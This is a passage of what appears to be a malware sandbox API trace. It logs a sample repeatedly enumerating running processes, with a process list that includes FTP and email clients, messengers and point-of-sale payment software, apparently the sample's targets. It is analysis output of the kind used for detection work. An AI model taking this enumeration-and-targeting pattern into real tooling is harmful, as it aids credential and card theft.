pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0241.265] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.266] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.268] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0241.269] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0241.270] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0241.272] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0241.273] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.275] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.276] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.280] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.282] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.283] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0241.284] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0241.286] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0241.287] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0241.289] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0241.290] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0241.294] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0241.296] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0241.297] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0241.299] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0241.301] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0241.303] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0241.304] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0241.305] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0241.307] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0241.435] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0241.436] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0241.438] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0241.439] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0241.441] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0241.442] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0241.443] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0241.445] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0241.446] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0241.447] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0241.450] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0241.452] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0241.454] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0241.456] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0241.458] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0241.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0241.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0241.463] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0241.466] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0241.469] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0241.471] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0241.473] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0241.475] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0241.477] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0241.478] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0241.576] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0241.578] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0241.579] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0241.581] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0241.582] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0241.584] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0241.586] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0241.588] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0241.590] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0241.591] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0241.593] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0241.594] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0241.596] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0241.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0241.599] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0241.601] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0241.602] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0241.604] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0241.606] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0241.607] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0241.609] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0241.610] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0241.612] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0241.613] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0241.614] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0241.616] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.617] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.619] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.670] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0241.671] CloseHandle (hObject=0x1b08) returned 1 [0241.671] Sleep (dwMilliseconds=0x64) [0241.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0241.855] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.857] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.859] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, 